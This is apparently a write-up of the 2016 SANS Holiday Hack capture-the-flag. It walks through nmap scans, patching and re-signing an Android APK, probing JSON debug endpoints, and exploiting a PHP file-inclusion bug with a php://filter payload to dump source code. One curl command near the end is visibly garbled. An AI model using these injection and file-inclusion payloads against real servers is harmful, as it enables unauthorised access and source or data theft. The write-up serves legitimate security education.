>gdt GDT>tk Entry: 154 Taken. GDT>ex >give elf egg The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek. The elf says - you have conquered this challenge - the game will now end. Your score is 15 [total of 585 points], in 9 moves. This gives you the rank of Beginner.

I send a quick e-mail off to Peppermint and get the next audio file, "discombobulatedaudio3.mp3", for our trouble.

The Debug Server

Taking a look at the Nmap results doesn't reveal much detail about this server.

# nmap -A -p - dev.northpolewonderland.com Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-17 22:01 EST Stats: 0:04:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 37.87% done; ETC: 22:12 (0:06:53 remaining) Nmap scan report for dev.northpolewonderland.com ( Host is up (0.023s latency). Other addresses for dev.northpolewonderland.com (not scanned): rDNS record for Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 a4:98:4c:b7:ba:53:71:ce:5c:b0:01:d6:66:2e:d2:e4 (DSA) | 2048 df:44:96:be:13:c7:13:8a:b4:4a:43:4d:5b:f4:d4:2f (RSA) |_ 256 b7:a2:a2:cc:d9:84:b4:34:98:4b:74:bc:4d:20:cd:90 (ECDSA) 80/tcp open http nginx 1.6.2 |_http-server-header: nginx/1.6.2 |_http-title: Site doesn't have a title (application/json). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: WAP|general purpose Running: Actiontec embedded, Linux 2.4.X|3.X OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2 OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2 Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 12.04 ms 2 11.01 ms (

It does indicate "application/json" content-type but using the POST method to send JSON objects to the "index.php" file we found in the APK didn't return any error messages or clues.

To understand the function of the webserver better, I started rooting around in the APK looking for hints.

In the "SantaGram_4.2/res/values/strings.xml" file, the below stood out.

<string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string> <string name="debug_data_enabled">false</string>

That's interesting. It appears that debug data is sent to the URL but by default debug is disabled.

Digging into this further, looking at the decompiled code as Java in the "SantaGram_4.2/com/northpolewonderland/santagram/EditProfile.class" file shows strings that indicate "Remote debug logging" and a JSON object structure.

if (getString(2131165214).equals("true")) { Log.i(getString(2131165204), "Remote debug logging is Enabled"); i = 1; } for (;;) { getSupportActionBar().a(true); getSupportActionBar().b(true); getSupportActionBar().a("Edit Profile"); this.a = new ProgressDialog(this); this.a.setTitle(2131165208); this.a.setIndeterminate(false); if (i != 0) {} try { JSONObject localJSONObject = new JSONObject(); localJSONObject.put("date", new SimpleDateFormat("yyyyMMddHHmmssZ").format(Calendar.getInstance().getTime())); localJSONObject.put("udid", Settings.Secure.getString(getContentResolver(), "android_id")); localJSONObject.put("debug", getClass().getCanonicalName() + ", " + getClass().getSimpleName()); localJSONObject.put("freemem", Runtime.getRuntime().totalMemory() - Runtime.getRuntime().freeMemory()); new Thread(new EditProfile.1(this, localJSONObject)).start();

Looking up each of those functions and creating values for them didn't get me anywhere.

*NOTE* I later realized my mistake here - a lack of understanding of the getCanonicalName and getSimpleName methods. It was worth it in the end since I learned more.

# curl -X POST -H "Content-Type: application/json" "http://dev.northpolewonderland.com/index.php" -d '{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"EditProfile, EditProfile","freemem":12345678}'
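For comparison, here is a sketch of the JSON body as the decompiled EditProfile code appears to assemble it. It rests on assumptions: the canonical class name is inferred from the class file's path inside the APK, the "udid" and "freemem" values are made-up stand-ins, and nothing here confirms that the server accepts this shape. The helper name is invented for the example.

```python
import json
from datetime import datetime, timedelta, timezone


def build_debug_payload(when, udid, canonical_name, simple_name, freemem):
    """Mirror the four put() calls from the decompiled Java as a plain dict."""
    return {
        # SimpleDateFormat("yyyyMMddHHmmssZ") maps to this strftime pattern.
        "date": when.strftime("%Y%m%d%H%M%S%z"),
        "udid": udid,
        # getCanonicalName() is the fully qualified name, getSimpleName() is not.
        "debug": f"{canonical_name}, {simple_name}",
        "freemem": freemem,
    }


if __name__ == "__main__":
    payload = build_debug_payload(
        datetime(2016, 11, 14, 13, 4, 21, tzinfo=timezone(timedelta(hours=-5))),
        "bacbec2c-dcf1-4237-8cf3-13d0bd4175a5",           # made-up device ID
        "com.northpolewonderland.santagram.EditProfile",  # inferred from the class path
        "EditProfile",
        12345678,                                         # made-up memory figure
    )
    print(json.dumps(payload))
```

The visible difference from the curl attempt is the "debug" field, which carries the package-qualified class name first.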

At this point, I came to the conclusion that the only way I was going to get the correct syntax for the JSON object the server expects was to run the APK.

For whatever reason I could not get the Android SDK emulator to work and resorted to downloading "free" Android emulators. I'm lucky I have a malware analysis VM as I have no doubt in my mind that this thing got compromised from all the shady Android emulators out there. Suffice to say, I found that the Chinese KOPLAYER worked well enough (it's designed to play Android games).

Once again, some helpful Elf hints give us the tools and knowledge we need to beat the challenge.

<Shinny Upatree> - Hi, my name is Shinny Upatree. I'm one of Santa's bug bounty elves.
<Shinny Upatree> - I'm the newest elf on Santa's bug bounty team. I've been spending time reversing Android apps.
<Shinny Upatree> - Did you know Android APK files are just zip files? If you unzip them, you can look at the application files.
<Shinny Upatree> - Android apps written in Java can be reverse engineered back into the Java form using JadX.
<Shinny Upatree> - The JadX-gui tool is quick and easy to decompile an APK, but the jadx command-line tool will export the APK as individual Java files.
<Shinny Upatree> - Android Studio can import JadX's decompiled files. It makes it easier to understand obfuscated code.
<Shinny Upatree> - Take a look at Joshua Wright's presentation from HackFest 2016 on using Android Studio and JadX effectively.


<Bushy Evergreen> - Hi, I'm Bushy Evergreen. Shinny and I lead up the Android Analysis team.
<Bushy Evergreen> - Shinny spends most of her time on app reverse engineering. I prefer to analyze apps at the Android bytecode layer.
<Bushy Evergreen> - My favorite technique? Decompiling Android apps with Apktool.
<Bushy Evergreen> - JadX is great for inspecting a Java representation of the app, but can't be changed and then recompiled.
<Bushy Evergreen> - With Apktool, I can preserve the functionality of the app, then change the Android bytecode smali files.
<Bushy Evergreen> - I can even change the values in Android XML files, then use Apktool again to recompile the app.
<Bushy Evergreen> - Apktool compiled apps can't be installed and run until they are signed. The Java keytool and jarsigner utilities are all you need for that.
<Bushy Evergreen> - This video on manipulating and re-signing Android apps is pretty useful.

I went ahead and decompiled the APK to get access to the smali files.

PS C:\Users\Mater Metal\Desktop> apktool d .\SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: C:\Users\Mater Metal\AppData\Local\apktool\framework\1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

We saw in the "EditProfile.class" that there is an if-then statement that checks whether debugging is enabled. Since we know that it's not, we can change the Smali so the debug code runs even when debugging is disabled.

In the "SantaGram_4.2/smali/com/northpolewonderland/santagram/EditProfile.smali" file, we see the if-then statement.

invoke-virtual {p0, v0}, Lcom/northpolewonderland/santagram/EditProfile;->getString(I)Ljava/lang/String;
move-result-object v0
const-string v3, "true"
invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v0
if-eqz v0, :cond_3
invoke-virtual {p0, v6}, Lcom/northpolewonderland/santagram/EditProfile;->getString(I)Ljava/lang/String;
move-result-object v0
const-string v3, "Remote debug logging is Enabled"
invoke-static {v0, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
move v0, v1

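To get what we want, we'll change the "if equal to zero" comparison, which skips the debug branch whenever the string comparison comes back false.

if-eqz v0, :cond_3

To "if not equal to zero", so the debug branch now runs when the setting is anything other than "true".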

if-nez v0, :cond_3
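If you'd rather script the edit than open the file by hand, the swap can be sketched in a few lines of Python. This is only an illustration: the smali excerpt is copied from the listing above, and invert_debug_check is a name I made up for the example, not anything Apktool provides.

```python
import re

# Excerpt of the smali shown above (only the lines around the branch).
SMALI = """\
    const-string v3, "true"
    invoke-virtual {v0, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
    move-result v0
    if-eqz v0, :cond_3
"""


def invert_debug_check(smali_text):
    """Swap the first `if-eqz v0, :cond_3` for `if-nez v0, :cond_3`.

    Hypothetical helper: it assumes the branch looks exactly like the
    one in EditProfile.smali and refuses to guess otherwise.
    """
    patched, count = re.subn(
        r"\bif-eqz(\s+v0,\s*:cond_3)\b", r"if-nez\1", smali_text, count=1
    )
    if count != 1:
        raise ValueError("expected branch not found, refusing to patch")
    return patched


patched = invert_debug_check(SMALI)
print(patched)
```

Limiting the substitution to a single, exact match is deliberate; a blanket search-and-replace of if-eqz would flip every null/zero check in the class.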

Next, we need to recompile the APK with our changes.

PS C:\Users\Mater Metal\Desktop> apktool b .\SantaGram_4.2
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...

After that, we'll need to sign the APK so that we can load it into our emulator.

PS C:\Users\Mater Metal\Desktop> & 'C:\Program Files\Java\jdk1.8.0_111\bin\keytool.exe' -genkey -v -keystore keys/SantaGram.keystore -alias SantaGram -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000
Enter keystore password:
Re-enter new password:
What is your first and last name?
  [Unknown]: Newt
What is the name of your organizational unit?
  [Unknown]: Dev
What is the name of your organization?
  [Unknown]: Dev
What is the name of your City or Locality?
  [Unknown]: North Pole
What is the name of your State or Province?
  [Unknown]: World
What is the two-letter country code for this unit?
  [Unknown]: SA
Is CN=Newt, OU=Dev, O=Dev, L=North Pole, ST=World, C=SA correct?
  [no]: yes
Generating 1,024 bit RSA key pair and self-signed certificate (SHA1withRSA) with a validity of 10,000 days
        for: CN=Newt, OU=Dev, O=Dev, L=North Pole, ST=World, C=SA
Enter key password for <SantaGram>
        (RETURN if same as keystore password):
Re-enter new password:
[Storing keys/SantaGram.keystore]
PS C:\Users\Mater Metal\Desktop> & 'C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe' -keystore .\keys\SantaGram.keystore .\SantaGram_4.2\dist\SantaGram_4.2.apk -sigalg SHA1withRSA -digestalg SHA1 SantaGram
Enter Passphrase for keystore:
jar signed.
Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-05) or after any future revocation date.

The APK successfully installs on KOPLAYER.

I'm continually impressed with the level of detail they put into this year's challenges!

Finally, editing our profile in the patched app lets us capture the request that we need.

We were so close the first time! I just didn't properly list the full path...
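As far as I understand it now, getCanonicalName returns the fully qualified class name (package included) while getSimpleName returns just the class name, so the "debug" field needs both forms. Here's a rough Python sketch of building the same body. debug_payload is a hypothetical helper of mine, and the date, udid, and freemem values are simply the ones I used in my own requests.

```python
import json


def debug_payload(canonical_name, date, udid, freemem):
    """Build the JSON body the debug server appears to expect.

    Assumption: the simple name is the last dot-separated piece of the
    canonical name, which holds for com.northpolewonderland.santagram.EditProfile.
    """
    simple_name = canonical_name.rsplit(".", 1)[-1]
    body = {
        "date": date,
        "udid": udid,
        "debug": f"{canonical_name}, {simple_name}",
        "freemem": freemem,
    }
    # Compact separators keep the body identical to the hand-written curl data.
    return json.dumps(body, separators=(",", ":"))


payload = debug_payload(
    "com.northpolewonderland.santagram.EditProfile",
    "20161114130421-0500",
    "bacbec2c-dcf1-4237-8cf3-13d0bd4175a5",
    12345678,
)
print(payload)
```

My first attempt effectively passed "EditProfile" as the canonical name, which is why the server never accepted it.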

# curl -X POST -H "Content-Type: application/json" "http://dev.northpolewonderland.com/index.php" -d '{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678}'
{"date":"20161219192057","status":"OK","filename":"debug-20161219192057-0.txt","request":{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678,"verbose":false}}

You can see that it returns a JSON object which includes a filename. One thing to note is that it also echoes back the original request we sent...but with something additional in it that we didn't specify: "verbose":false.


Let's flip that to "true" and see what happens.

# curl -X POST -H "Content-Type: application/json" "http://dev.northpolewonderland.com/index.php" -d '{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678,"verbose":true}'
{"date":"20161219192600","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161219192600-0.txt","filename.len":26,"request":{"date":"20161114130421-0500","udid":"bacbec2c-dcf1-4237-8cf3-13d0bd4175a5","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":12345678,"verbose":true},"files":["debug-20161219191712-0.txt","debug-20161219191950-0.txt","debug-20161219192001-0.txt","debug-20161219192057-0.txt","debug-20161219192353-0.txt","debug-20161219192406-0.txt","debug-20161219192457-0.txt","debug-20161219192600-0.txt","debug-20161224235959-0.mp3","index.php"]}

We are provided with a list of files on the server and find the location of our MP3 file, "debug-20161224235959-0.mp3".
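Eyeballing the response works fine here, but if the listing were longer I'd pull the audio file out programmatically. A small sketch, using a trimmed copy of the verbose response above (audio_files is just a name I picked for the example):

```python
import json

# Trimmed copy of the verbose response; the real one lists more debug files.
response_text = """
{"status": "OK",
 "filename": "debug-20161219192600-0.txt",
 "files": ["debug-20161219191712-0.txt",
           "debug-20161219192600-0.txt",
           "debug-20161224235959-0.mp3",
           "index.php"]}
"""


def audio_files(text):
    """Return every .mp3 entry from the "files" array of a verbose response."""
    listing = json.loads(text).get("files", [])
    return [name for name in listing if name.lower().endswith(".mp3")]


print(audio_files(response_text))
```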

The Banner Ad Server

Starting off with Nmap shows that we'll be dealing with another website.

# nmap -sC ads.northpolewonderland.com
Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-14 10:45 EST
Nmap scan report for ads.northpolewonderland.com (
Host is up (0.071s latency).
Other addresses for ads.northpolewonderland.com (not scanned):
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 1024 cf:4c:e0:20:6d:e7:c6:b1:6b:9f:ac:75:45:16:b1:93 (DSA)
| 2048 b9:a4:df:1e:34:0f:58:3e:2c:b7:e6:c6:77:0f:f5:3b (RSA)
|_ 256 02:ec:fc:80:c0:fc:76:b3:cd:d2:64:39:af:3c:13:b3 (ECDSA)
80/tcp open http
|_http-title: Ad Nauseam - Stupid Ads for Stupid People

Looking at the site shows some scrolling ads and in the top right is a "Login" button.

Peering under the hood at the source code reveals this snippet.

<script type="text/javascript">__meteor_runtime_config__ = JSON.parse(decodeURIComponent("%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D"));</script>

Decoding that gives us the JSON object below; however, the really important thing is the "__meteor_runtime_config__" variable itself, which tells us that it's a Meteor-built application.

{
  "meteorRelease":"METEOR@1.4.2.3",
  "meteorEnv":{
    "NODE_ENV":"production",
    "TEST_METADATA":"{}"
  },
  "PUBLIC_SETTINGS":{},
  "ROOT_URL":"http://ads.northpolewonderland.com",
  "ROOT_URL_PATH_PREFIX":"",
  "appId":"1vgh1e61x7h692h4hyt1",
  "autoupdateVersion":"537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1",
  "autoupdateVersionRefreshable":"05c3f7dba9f3e15efa3d971acf18cab901dc0505",
  "autoupdateVersionCordova":"none"
}
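The decoding step is the same thing the page's own script does: URL-decode the string, then parse it as JSON. A minimal Python equivalent is below. To keep it short I've trimmed the encoded string down to two of the keys, so treat the input as an excerpt rather than the full value from the page.

```python
import json
from urllib.parse import unquote

# Excerpt of the percent-encoded config (only two keys kept for brevity).
encoded = (
    "%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C"
    "%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%7D"
)

# Same two steps as JSON.parse(decodeURIComponent(...)) in the page source.
config = json.loads(unquote(encoded))

for key, value in config.items():
    print(f"{key}: {value}")
```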

I'm not familiar with the Meteor Framework but luckily the Elf Pepper Minstix has us covered with a few useful hints!

<Pepper Minstix> - Hi, my name is Pepper Minstix. I'm one of Santa's bug bounty elves.
<Pepper Minstix> - Lately, I've been spending time attacking JavaScript frameworks, specifically the Meteor Framework.
<Pepper Minstix> - Meteor uses a publish/subscribe messaging platform. This makes it easy for a web page to get dynamic data from a server.
<Pepper Minstix> - Meteor's message passing mechanism uses the Distributed Data Protocol (DDP). DDP is basically a JSON-based protocol using WebSockets and SockJS for RPC and data management.
<Pepper Minstix> - The good news is that Meteor mitigates most XSS attacks, CSRF attacks, and SQL injection attacks.
<Pepper Minstix> - The bad news is that people get a little too caught up in messaging subscriptions, and get too much data from the server.
<Pepper Minstix> - You should check out Tim Medin's talk from HackFest 2016 and the related blog post.
<Pepper Minstix> - Also, Meteor Miner is a browser add-on for Tampermonkey to easily browse through Meteor subscriptions. Check it out!

Grabbing Meteor Miner and checking out the site shows a "Collection" called "HomeQuotes".

Note the "audio" field for the single record.

Throwing the below command into the browser's JavaScript console gives us the output for the records.


Looking at the 5th element in the array gives us the information we're after, the URL for the next MP3 - "discombobulatedaudio5.mp3".

The Uncaught Exception Handler Server

For the exception server, we know based on the URL in the APK that there is an "exception.php" file. Browsing to that file gives us a message that we must use the HTTP POST method. Upon each "correct" request, I kept receiving error messages that divulged what the next expected piece was.

# curl -s "http://ex.northpolewonderland.com/exception.php"
Request method must be POST
# curl -X POST -s "http://ex.northpolewonderland.com/exception.php"
Content type must be: application/json
# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"1":"1"}'
Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.
# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump"}'
Fatal error! JSON key 'data' must be set.
# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":1}'
Fatal error! JSON key 'crashdump' must be set.
# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":1,"crashdump":1}'
Fatal error! JSON key 'crashdump' must be set.
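The last two requests return the same error because "crashdump" has to live inside the "data" object rather than next to it. To make the order of the checks easier to see, here's a local Python model of them. It is my own approximation, pieced together from the error messages and the exception.php source recovered later in this writeup; exception_endpoint is a made-up name and nothing here talks to the real server.

```python
def exception_endpoint(method, content_type, body):
    """Return the first error the server would report, or None if all checks pass.

    `body` is the already-parsed JSON (a dict), or None when nothing was sent.
    """
    if method.upper() != "POST":
        return "Request method must be POST"
    if (content_type or "").strip().lower() != "application/json":
        return "Content type must be: application/json"
    if not isinstance(body, dict):
        return "POST contains invalid JSON!"
    if body.get("operation") not in ("WriteCrashDump", "ReadCrashDump"):
        return ("Fatal error! JSON key 'operation' must be set to "
                "WriteCrashDump or ReadCrashDump.")
    if body.get("data") is None:
        return "Fatal error! JSON key 'data' must be set."
    if body["operation"] == "ReadCrashDump":
        data = body["data"]
        # "crashdump" is only looked up inside "data", never at the top level.
        if not (isinstance(data, dict) and data.get("crashdump") is not None):
            return "Fatal error! JSON key 'crashdump' must be set."
    return None


attempts = [
    {"operation": "ReadCrashDump", "data": 1},
    {"operation": "ReadCrashDump", "data": 1, "crashdump": 1},
    {"operation": "ReadCrashDump", "data": {"crashdump": "crashdump-QpU4La"}},
]
for attempt in attempts:
    print(attempt, "->", exception_endpoint("POST", "application/json", attempt))
```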

Playing around with the two operations, I found that "WriteCrashDump" lets me submit data and then access it through the website at the file name it returns.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"WriteCrashDump","data":"12345"}'
{
  "success" : true,
  "folder" : "docs",
  "crashdump" : "crashdump-9dftyA.php"
}


I tried various forms of injection to get the PHP to interpret on the website but it looked like htmlentities and/or additional filtering was in play and preventing this. I did find a way to bypass these for XSS, but since that doesn't progress us, it was a bit pointless.

I did find that the ReadCrashDump operation would also allow me to look at the data submitted through WriteCrashDump.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"WriteCrashDump","data":"<?php phpinfo();?>"}'
{
  "success" : true,
  "folder" : "docs",
  "crashdump" : "crashdump-QpU4La.php"
}
# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QpU4La"}}'
"<?php phpinfo();?>"

My cheeky PHP injection didn't work here either.

You'll note that the full filename isn't listed here so it's safe to assume that ".php" is being appended. This is further confirmed by just submitting it with the extension.

Fatal error! crashdump value duplicate '.php' extension detected.

It makes sense then that this is some sort of file inclusion and opens up a number of potential attack possibilities. This is further confirmed with the below test.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php" -d '{"operation":"ReadCrashDump","data":{"crashdump":"../docs/crashdump-w5lXxR"}}'
"test"

I wasn't able to get any directory traversal attacks working but I was reminded of another Elf hint.

<Sugarplum Mary> - Hi, I'm Sugarplum Mary. I'm a developer!
<Sugarplum Mary> - I like PHP, it offers so much flexibility even though the syntax is straight out of 1978.
<Sugarplum Mary> - PHP Filters can be used to read all kinds of I/O Streams.
<Sugarplum Mary> - As a developer, I must be careful to ensure attackers can't use them to access sensitive files or data.
<Sugarplum Mary> - Jeff McJunkin wrote a blog post on local file inclusions using this technique.
<Sugarplum Mary> - I need to go back and make sure no one can read my source code using this technique.
<Sugarplum Mary> - I love curl braces and semicolons.

Using this technique allows us to quickly get the source code for the "exception.php" file and find the location of our next audio file, discombobulated-audio-6-XyzE3N9YqKNH.mp3.

# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php?crashdump=123" -d '{"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=exception"}}'
PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDogZGlzY29tYm9idWxhdGVkLWF1ZGlvLTYtWHl6RTNOOVlxS05ILm1wMwoKIyBDb2RlIGZyb20gaHR0cDovL3RoaXNpbnRlcmVzdHNtZS5jb20vcmVjZWl2aW5nLWpzb24tcG9zdC1kYXRhLXZpYS1waHAvCiMgTWFrZSBzdXJlIHRoYXQgaXQgaXMgYSBQT1NUIHJlcXVlc3QuCmlmKHN0cmNhc2VjbXAoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10sICdQT1NUJykgIT0gMCl7CiAgICBkaWUoIlJlcXVlc3QgbWV0aG9kIG11c3QgYmUgUE9TVC5cbiIpOwp9CgkgCiMgTWFrZSBzdXJlIHRoYXQgdGhlIGNvbnRlbnQgdHlwZSBvZiB0aGUgUE9TVCByZXF1ZXN0IGhhcyBiZWVuIHNldCB0byBhcHBsaWNhdGlvbi9qc29uCiRjb250ZW50VHlwZSA9IGlzc2V0KCRfU0VSVkVSWyJDT05URU5UX1RZUEUiXSkgPyB0cmltKCRfU0VSVkVSWyJDT05URU5UX1RZUEUiXSkgOiAnJzsKaWYoc3RyY2FzZWNtcCgkY29udGVudFR5cGUsICdhcHBsaWNhdGlvbi9qc29uJykgIT0gMCl7CiAgICBkaWUoIkNvbnRlbnQgdHlwZSBtdXN0IGJlOiBhcHBsaWNhdGlvbi9qc29uLFxuIik7Cn0KCQojIEdyYWIgdGhlIHJhdyBQT1NULiBOZWNlc3NhcnkgZm9yIEpTT04gaW4gcGFydGljdWxhci4KJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKJG9iaiA9IGpzb25fZGVjb2RlKCRjb250ZW50LCB0cnVlKTsKCSMgSWYganNvbl9kZWNvZGUgZmFpbGVkLCB0aGUgSlNPTiBpcyBpbnZhbGlkLgppZighaXNfYXJyYXkoJG9iaikpewogICAgZGllKCJQT1NUIGNvbnRhaW5zIGludmFsaWQgSlNPTiEgXG4iKTsKfQoKIyBQcm9jZXNzIHRoZSBKU09OLgppZiAoICEgaXNzZXQoICRvYmpbJ29wZXJhdGlvbiddKSBvciAoCgkkb2JqWydvcGVyYXRpb24nXSAhPT0gIldyaXRlQ3Jhc2hEdW1wIiBhbmQKCSRvYmpbJ29wZXJhdGlvbiddICE9PSAiUmVhZENyYXNoRHVtcCIpKQoJewoJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ29wZXJhdGlvbicgbXVzdCBiZSBzZXQgdG8gV3JpdGVDcmFzaER1bXAgb3IgUmVhZENyYXNoRHVtcC5cbiIpOwp9CmlmICggaXNzZXQoJG9ialsnZGF0YSddKSkgewoJaWYgKCRvYmpbJ29wZXJhdGlvbiddID09PSAiV3JpdGVDcmFzaER1bXAiKSB7CgkJIyBXcml0ZSBhIG5ldyBjcmFzaCBkdW1wIHRvIGRpc2sKCQlwcm9jZXNzQ3Jhc2hEdW1wKCRvYmpbJ2RhdGEnXSk7Cgl9CgllbHNlaWYgKCRvYmpbJ29wZXJhdGlvbiddID09PSAiUmVhZENyYXNoRHVtcCIpIHsKCQkjIFJlYWQgYSBjcmFzaCBkdW1wIGJhY2sgZnJvbSBkaXNrCgkJcmVhZENyYXNoZHVtcCgkb2JqWydkYXRhJ10pOwoJfQp9CmVsc2UgewoJIyBkYXRhIGtleSB1bnNldAoJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ2RhdGEnIG11c3QgYmUgc2V0LiBcbiIpOwp9CmZ1bmN0aW9uIHByb2Nlc3NDcmFzaGR1bXAoJGNyYXNoZHVtcCkgewoJJGJhc2VwYXRoID0gIi92YXIvd3d3L2h0bWwvZG9jcy8iOwoJJG91dHB1dGZpbGVuYW1lID0gdGVtcG5hbSgkYmFzZXBhdGgsICJjcmFzaGR1bXAtIik7Cgl1bmxpbmsoJG91dHB1dGZpbGVuYW1lKTsKCQoJJG91dHB1dGZpbGVuYW1lID0gJG91dHB1dGZpbGVuYW1lIC4gIi5waHAiOwoJJGJhc2VuYW1lID0gYmFzZW5hbWUoJG91dHB1dGZpbGVuYW1lKTsKCQoJJGNyYXNoZHVtcF9lbmNvZGVkID0gIjw/cGhwIHByaW50KCciIC4ganNvbl9lbmNvZGUoJGNyYXNoZHVtcCwgSlNPTl9QUkVUVFlfUFJJTlQpIC4gIicpOyI7CglmaWxlX3B1dF9jb250ZW50cygkb3V0cHV0ZmlsZW5hbWUsICRjcmFzaGR1bXBfZW5jb2RlZCk7CgkJCQoJcHJpbnQgPDw8RU5ECnsKCSJzdWNjZXNzIiA6IHRydWUsCgkiZm9sZGVyIiA6ICJkb2NzIiwKCSJjcmFzaGR1bXAiIDogIiRiYXNlbmFtZSIKfQoKRU5EOwp9CmZ1bmN0aW9uIHJlYWRDcmFzaGR1bXAoJHJlcXVlc3RlZENyYXNoZHVtcCkgewoJJGJhc2VwYXRoID0gIi92YXIvd3d3L2h0bWwvZG9jcy8iOwoJY2hkaXIoJGJhc2VwYXRoKTsJCQoJCglpZiAoICEgaXNzZXQoJHJlcXVlc3RlZENyYXNoZHVtcFsnY3Jhc2hkdW1wJ10pKSB7CgkJZGllKCJGYXRhbCBlcnJvciEgSlNPTiBrZXkgJ2NyYXNoZHVtcCcgbXVzdCBiZSBzZXQuIFxuIik7Cgl9CgoJaWYgKCBzdWJzdHIoc3RycmNocigkcmVxdWVzdGVkQ3Jhc2hkdW1wWydjcmFzaGR1bXAnXSwgIi4iKSwgMSkgPT09ICJwaHAiICkgewoJCWRpZSgiRmF0YWwgZXJyb3IhIGNyYXNoZHVtcCB2YWx1ZSBkdXBsaWNhdGUgJy5waHAnIGV4dGVuc2lvbiBkZXRlY3RlZC5cbiIpOwoJfQoJZWxzZSB7CgkJcmVxdWlyZSgkcmVxdWVzdGVkQ3Jhc2hkdW1wWydjcmFzaGR1bXAnXSAuICcucGhwJyk7Cgl9CQp9Cgo/Pg==
# curl -X POST -H "Content-Type: application/json" -s "http://ex.northpolewonderland.com/exception.php?cp","data":{"crashdump":"php://filter/convert.base64-encode/resource=exception"}}' |base64 -d
<?php

# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

# Code from http://thisinterestsme.com/receiving-json-post-data-via-php/
# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST.\n");
}

# Make sure that the content type of the POST request has been set to application/json
